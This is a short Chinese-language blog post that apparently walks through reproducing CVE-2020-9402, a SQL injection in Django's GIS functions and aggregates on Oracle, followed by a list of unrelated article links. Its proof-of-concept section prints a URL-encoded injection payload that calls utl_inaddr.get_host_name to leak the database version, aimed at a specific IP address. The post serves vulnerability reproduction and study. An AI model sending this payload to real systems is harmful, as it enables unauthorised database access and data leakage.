当前位置: 首页 > article >正文

Oracle SQL 注入上的 Django GIS 函数和聚合漏洞 (CVE-2020-9402)

article 2025/3/13 13:55:29

漏洞描述

Django 于2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。

参考链接:

  • Django security releases issued: 3.0.4, 2.2.11, and 1.11.29 | Weblog | Django

该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。

 漏洞环境及利用

搭建docker环境

这里遇到一个问题,这个占用空间比较大卡住了,后来查看docker日志才发现

漏洞利用POC

http://139.196.87.102:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

漏洞利用如下


http://www.kler.cn/a/144437.html

相关文章:

  • ElasticSearch查询语法及深度分页问题
  • C语言指针
  • C++类与对象(6)—初始化列表、explicit关键字、static成员
  • 日历视图,轻松解决时间管理难题丨三叠云
  • A. Weird Sum - 思维
  • 【AI认证笔记】NO.2人工智能的发展
  • 字符串函数
  • 绿色能源守护者:光伏运维无人机
  • C++初阶 | [六] 模板初阶
  • 02 _ 架构分层:我们为什么一定要这么做?
  • idea git将某个分支内的commit合并到其他分支
  • 汽车电子 -- 车载ADAS
  • macos安装小软件 cmake
  • 6 个有效且可用的顶级 Android 数据恢复工具
  • 【深度学习】P1 数据缺失值预处理
  • 【Linux】Linux权限管理
  • 最新AI创作系统ChatGPT系统运营源码,支持GPT-4图片对话能力,上传图片并识图理解对话,支持DALL-E3文生图
  • 深度学习+不良身体姿势检测+警报系统+代码+部署(姿态识别矫正系统)
  • 【分布式】分布式事务及其解决方案
  • JAVA 面向对象编程